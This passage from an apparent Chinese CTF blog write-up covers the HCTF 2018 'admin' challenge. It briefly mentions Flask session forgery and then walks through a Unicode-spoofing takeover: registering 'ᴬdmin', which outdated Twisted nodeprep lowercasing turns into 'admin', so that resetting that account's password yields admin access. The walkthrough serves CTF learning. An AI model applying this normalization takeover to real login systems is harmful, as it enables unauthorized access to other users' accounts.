request.method == <span class="string">&#x27;POST&#x27;</span>:</span><br><span class="line">        </span><br><span class="line">        flash(<span class="string">&#x27;post successful&#x27;</span>)</span><br><span class="line">        <span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;index&#x27;</span>))</span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">&#x27;edit.html&#x27;</span>, title = <span class="string">&#x27;edit&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.errorhandler(<span class="params"><span class="number">404</span></span>)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">page_not_found</span>(<span class="params">error</span>):</span></span><br><span class="line">    title = unicode(error)</span><br><span class="line">    message = error.description</span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">&#x27;errors.html&#x27;</span>, title=title, message=message)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">strlower</span>(<span class="params">username</span>):</span></span><br><span class="line">    username = nodeprep.prepare(username)</span><br><span class="line">    <span class="keyword">return</span> username</span><br></pre></td></tr></table></figure>

<h2 id="10-1-法一：session-欺骗"><a href="#10-1-法一：session-欺骗" class="headerlink" title="10.1 法一：session 欺骗"></a>10.1 法一：session 欺骗</h2><p>​    利用 Flask 是一种不包含数据库操作的框架，只能将 session 储存在 cookie 当中。</p>
<p>​    这里使用第二种方法，下面介绍。</p>
<p><strong>参考：</strong></p>
<ul>
<li><p><a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/client-session-security.html">Flask session 安全性问题</a></p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/f92311564ad0">https://www.jianshu.com/p/f92311564ad0</a></p>
</li>
</ul>
<h2 id="10-2-Unicode-欺骗"><a href="#10-2-Unicode-欺骗" class="headerlink" title="10.2 Unicode 欺骗"></a>10.2 Unicode 欺骗</h2><p>​    看上面的路由代码，每当用户输入用户名的时候，都会进行 <code>将 name 转换为小写</code> 的操作，而装欢的函数并不是 PHP自带的函数 <code>lower</code> ，在代码最后发现，使用的是自己定义的一个函数  <code>strlower</code> 。</p>
<p>​    该函数定义的方法是使用了 <code>nodeprep.prepare</code> ，而 <code>from twisted.words.protocols.jabber.xmpp_stringprep import nodeprep</code> ，可以看到该函数是从 <code>twisted</code> 中导入的。从所给的 <code>requirements.txt</code> 文件文件中看到， 该 Twisted 版本是 <code>10.2.0</code> ，而上网查到，与官网的最新版本差距很大，从而猜测会存在漏洞。</p>
<p><img src="https://i.loli.net/2021/06/04/DWgonFrZSepNQkC.png" alt="image-20210604170828136"></p>
<p><img src="https://i.loli.net/2021/06/04/m98H5qVOeGAnNvo.png" alt="image-20210604174525776"></p>
<p><strong>一些关于 Unicode 的安全性问题博客，参考链接</strong>：</p>
<ul>
<li><p><a target="_blank" rel="noopener" href="https://www.dazhuanlan.com/2019/12/09/5dedf52936197/">https://www.dazhuanlan.com/2019/12/09/5dedf52936197/</a></p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/5402">https://xz.aliyun.com/t/5402</a></p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://gality.cn/?p=123">https://gality.cn/?p=123</a></p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://blog.lyle.ac.cn/2018/12/08/idnfuzz/">https://blog.lyle.ac.cn/2018/12/08/idnfuzz/</a></p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://blog.lyle.ac.cn/2018/10/29/unicode-normalization/">https://blog.lyle.ac.cn/2018/10/29/unicode-normalization/</a></p>
</li>
</ul>
<p>原理就是如果我们注册一个 <code>ᴬdmin</code> 的用户，注册时经过<code>nodeprep.prepare</code> 转化将会变为  <code>Admin</code> ，而如果 <code>Admin </code> 再次调用一次 <code>nodeprep.prepare</code> ，又会把 <code>A</code> 变成 <code>a</code> 。所以如果我们 注册一个 <code>ᴬdmin</code>  ，然后修改密码该用户的密码，就相当于修改的是 <code> admin</code> 的密码，从而达到最终越权的目的。</p>
<p><strong>解题：</strong></p>
<ol>
<li>注册 <code>ᴬdmin</code>  用户并登陆进去，可以看到相当于登陆的是 <code>Admin</code> 用户</li>
</ol>
<p><img src="https://i.loli.net/2021/06/04/boaRlQ5x8vAdyEY.png" alt="image-20210604172231489"></p>
<ol start="2">
<li>修改 <code>ᴬdmin</code> 用户的密码为 123456</li>
</ol>
<p><img src="https://i.loli.net/2021/06/04/mhuZaDQe9NKIO2q.png" alt="image-20210604172434457"></p>
<ol start="2">
<li>使用 <code>admin</code> 用户，密码为 <code>123456</code> 登录，得到 flag</li>
</ol>
<p><img src="https://i.loli.net/2021/06/04/hzMjc8yRePDLwpo.png" alt="image-20210604172507899"></p>

      
    </div>
    <footer class="article-footer">
      
        <div id="donation_div"></div>


<script src="/js/vdonate.js"></script>

<script>
var a = new Donate({
  title: '如果觉得我的文章对您有用，请随意打赏。您的支持将鼓励我继续创作!', // 可选参数，打赏标题
  btnText: 'Donate', // 可选参数，打赏按钮文字
  el: document.getElementById('donation_div'),
  wechatImage: 'https://i.loli.net/2021/07/09/UNXc5a6nbWxgzru.png',
  alipayImage: 'https://i.loli.net/2021/07/09/Sf9nJd8hkOypTar.png'
});
</script>
      
      
      <div>
        <ul class="post-copyright">
          <li class="post-copyright-author">
          <strong>Post author:  </strong>xizhi-future</a>
          </li>
          <li class="post-copyright-link">
          <strong>Post link:  </strong>
          <a href="/2021/06/04/BUUCTF-WEB（二）/" target="_blank" title="BUUCTF-WEB(二)">https://xizhi-future.github.io/2021/06/04/BUUCTF-WEB（二）/</a>
          </li>
          <li class="post-copyright-license">
            <strong>Copyright Notice:   </strong>
            All articles in this blog are licensed under <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank" title="Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)">CC BY-NC-ND 4.0</a>
            unless stating additionally.
          </li>
         
        </ul>
<div>

      
      
        
	<div id="comment">
		<!-- 来必力City版安装代码 -->
		<div id="lv-container" data-id="city" data-uid="MTAyMC8yOTQ4MS82MDQ5">
		<script type="text/javascript">
		   (function(d, s) {
		       var j, e = d.getElementsByTagName(s)[0];

		       if (typeof LivereTower === 'function') { return; }

		       j = d.createElement(s);
		       j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
		       j.async = true;

		       e.parentNode.insertBefore(j, e);
		   })(document, 'script');
		</script>
		<noscript>为正常使用来必力评论功能请激活JavaScript</noscript>
		</div>
		<!-- City版安装代码已完成 -->
	</div>



      
      
        
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/BUUCTF/" rel="tag">BUUCTF</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CTF/" rel="tag">CTF</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Web/" rel="tag">Web</a></li></ul>

      

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2021/06/04/BUUCTF-WEB%EF%BC%88%E4%B8%89%EF%BC%89/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          BUUCTF-WEB(三)
        
      </div>
    </a>
  
  
    <a href="/2021/05/26/BUUCTF-WEB%EF%BC%88%E4%B8%80%EF%BC%89/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">BUUCTF-Web(一)</div>
    </a>
  
</nav>

  
</article>

<!-- Table of Contents -->

  <aside id="toc-sidebar">
    <div id="toc" class="toc-article">
    <strong class="toc-title">Contents</strong>
    
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%80%E3%80%81-%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-Knife1"><span class="nav-number">1.</span> <span class="nav-text">一、[极客大挑战 2019]Knife1</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BA%8C%E3%80%81-%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-Http1"><span class="nav-number">2.</span> <span class="nav-text">二、[极客大挑战 2019]Http1</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%89%E3%80%81-%E6%8A%A4%E7%BD%912018-easy-tornado1"><span class="nav-number">3.</span> <span class="nav-text">三、[护网2018]easy_tornado1</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%9B%9B%E3%80%81-RoarCTF-2019-Easy-Calc1"><span class="nav-number">4.</span> <span class="nav-text">四、[RoarCTF 2019]Easy Calc1</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#4-1-%E6%80%BB%E7%BB%93%EF%BC%9APHP-%E5%AD%97%E7%AC%A6%E4%B8%B2%E8%A7%A3%E6%9E%90%E7%89%B9%E6%80%A7"><span class="nav-number">4.1.</span> <span class="nav-text">4.1 总结：PHP 字符串解析特性</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BA%94%E3%80%81-%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-PHP1"><span class="nav-number">5.</span> <span class="nav-text">五、[极客大挑战 2019]PHP1</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#5-1-%E6%80%BB%E7%BB%93%EF%BC%9A%E5%BA%8F%E5%88%97%E5%8C%96"><span class="nav-number">5.1.</span> <span class="nav-text">5.1 总结：序列化</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%85%AD%E3%80%81-%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-Upload1"><span class="nav-number">6.</span> <span class="nav-text">六、[极客大挑战 2019]Upload1</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#6-1-PHP-%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC%E5%8F%98%E5%BD%A2"><span class="nav-number">6.1.</span> <span class="nav-text">6.1 PHP 一句话木马变形</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%83%E3%80%81-ACTF2020-%E6%96%B0%E7%94%9F%E8%B5%9B-Upload1"><span class="nav-number">7.</span> <span class="nav-text">七、[ACTF2020 新生赛]Upload1</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%85%AB%E3%80%81-%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019-BabySQL1"><span class="nav-number">8.</span> <span class="nav-text">八、[极客大挑战2019]BabySQL1</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B9%9D%E3%80%81-ACTF2020-%E6%96%B0%E7%94%9F%E8%B5%9B-BackupFile1"><span class="nav-number">9.</span> <span class="nav-text">九、[ACTF2020 新生赛]BackupFile1</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#9-1-%E6%80%BB%E7%BB%93"><span class="nav-number">9.1.</span> <span class="nav-text">9.1 总结</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%8D%81%E3%80%81-HCTF-2018-admin1"><span class="nav-number">10.</span> <span class="nav-text">十、[HCTF 2018]admin1</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#10-1-%E6%B3%95%E4%B8%80%EF%BC%9Asession-%E6%AC%BA%E9%AA%97"><span class="nav-number">10.1.</span> <span class="nav-text">10.1 法一：session 欺骗</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#10-2-Unicode-%E6%AC%BA%E9%AA%97"><span class="nav-number">10.2.</span> <span class="nav-text">10.2 Unicode 欺骗</span></a></li></ol></li></ol>
    
    </div>
  </aside>

</section>
        
      </div>
      
      <footer id="footer">
  

  <div class="container">
      	<div class="row">
	      <p> Powered by <a href="http://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/iTimeTraveler/hexo-theme-hiker" target="_blank">Hexo-theme-hiker</a> </p>
	      <p id="copyRightEn">Copyright &copy; 2013 - 2021 忆 执 昔 来 的 旅 途 All Rights Reserved.</p>
	      
	      
    		<p class="busuanzi_uv">
				UV : <span id="busuanzi_value_site_uv"></span> |  
				PV : <span id="busuanzi_value_site_pv"></span>
		    </p>
  		   
		</div>

		
  </div>
</footer>


<!-- min height -->

<script>
    var wrapdiv = document.getElementById("wrap");
    var contentdiv = document.getElementById("content");
    var allheader = document.getElementById("allheader");

    wrapdiv.style.minHeight = document.body.offsetHeight + "px";
    if (allheader != null) {
      contentdiv.style.minHeight = document.body.offsetHeight - allheader.offsetHeight - document.getElementById("footer").offsetHeight + "px";
    } else {
      contentdiv.style.minHeight = document.body.offsetHeight - document.getElementById("footer").offsetHeight + "px";
    }
</script>
    </div>
    <!-- <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
    <a href="/categories" class="mobile-nav-link">Categories</a>
  
    <a href="/tags" class="mobile-nav-link">Tags</a>
  
    <a href="/essayists" class="mobile-nav-link">Essayists</a>
  
    <a href="/playist" class="mobile-nav-link">Playist</a>
  
    <a href="/about" class="mobile-nav-link">About</a>
  
</nav> -->
    

<!-- mathjax config similar to math.stackexchange -->

<script type="text/x-mathjax-config">
  MathJax.Hub.Config({
    tex2jax: {
      inlineMath: [ ['$','$'], ["\\(","\\)"] ],
      processEscapes: true
    }
  });
</script>

<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
      tex2jax: {
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
      }
    });
</script>

<script type="text/x-mathjax-config">
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for(i=0; i < all.length; i += 1) {
            all[i].SourceElement().parentNode.className += ' has-jax';
        }
    });
</script>

<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
</script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/scripts.js"></script>





  
<script src="/js/dialog.js"></script>









	<div style="display: none;">
    <script src="https://s95.cnzz.com/z_stat.php?id=1260716016&web_id=1260716016" language="JavaScript"></script>
  </div>



	<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js">
	</script>






  </div>

  <div class="modal fade" id="myModal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true" style="display: none;">
  <div class="modal-dialog">
    <div class="modal-content">
      <div class="modal-header">
        <h2 class="modal-title" id="myModalLabel">设置</h2>
      </div>
      <hr style="margin-top:0px; margin-bottom:0px; width:80%; border-top: 3px solid #000;">
      <hr style="margin-top:2px; margin-bottom:0px; width:80%; border-top: 1px solid #000;">


      <div class="modal-body">
          <div style="margin:6px;">
            <a data-toggle="collapse" data-parent="#accordion" href="#collapseOne" onclick="javascript:setFontSize();" aria-expanded="true" aria-controls="collapseOne">
              正文字号大小
            </a>
          </div>
          <div id="collapseOne" class="panel-collapse collapse" role="tabpanel" aria-labelledby="headingOne">
          <div class="panel-body">
            您已调整页面字体大小
          </div>
        </div>
      


          <div style="margin:6px;">
            <a data-toggle="collapse" data-parent="#accordion" href="#collapseTwo" onclick="javascript:setBackground();" aria-expanded="true" aria-controls="collapseTwo">
              夜间护眼模式
            </a>
        </div>
          <div id="collapseTwo" class="panel-collapse collapse" role="tabpanel" aria-labelledby="headingTwo">
          <div class="panel-body">
            夜间模式已经开启，再次单击按钮即可关闭 
          </div>
        </div>

        <div>
            <a data-toggle="collapse" data-parent="#accordion" href="#collapseThree" aria-expanded="true" aria-controls="collapseThree">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;关 于&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a>
        </div>
         <div id="collapseThree" class="panel-collapse collapse" role="tabpanel" aria-labelledby="headingThree">
          <div class="panel-body">
            忆 执 昔 来 的 旅 途
          </div>
          <div class="panel-body">
            Copyright © 2021 xizhi-future All Rights Reserved.
          </div>
        </div>
      </div>


      <hr style="margin-top:0px; margin-bottom:0px; width:80%; border-top: 1px solid #000;">
      <hr style="margin-top:2px; margin-bottom:0px; width:80%; border-top: 3px solid #000;">
      <div class="modal-footer">
        <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
      </div>
    </div>
  </div>
</div>
  
  <a id="rocket" href="#top" class=""></a>
  <script type="text/javascript" src="/js/totop.js?v=1.0.0" async=""></script>
  
    <a id="menu-switch"><i class="fa fa-bars fa-lg"></i></a>
  
</body>
</html>